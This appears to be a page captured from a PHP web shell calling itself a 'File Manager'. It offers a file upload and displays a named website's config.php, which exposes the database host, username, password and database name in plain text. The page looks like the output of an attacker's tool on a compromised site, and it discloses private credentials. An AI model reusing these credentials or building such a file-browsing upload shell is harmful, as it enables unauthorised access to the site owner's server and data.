File Manager

Current Path : /webspace/www.alexishaulot.be/html/
Upload File :
Current File : /webspace/www.alexishaulot.be/html/config.php

<?php
	$host="localhost";
	$user="ah";
	$pass="@lex!sH";
	$db="ah";
	
	$link = mysql_connect($host,$user,$pass) or die("Error connecting DB<br />".mysql_error());
	mysql_select_db($db);
?>

File Manager Version 1.0, Coded By Lucas
Email: hehe@yahoo.com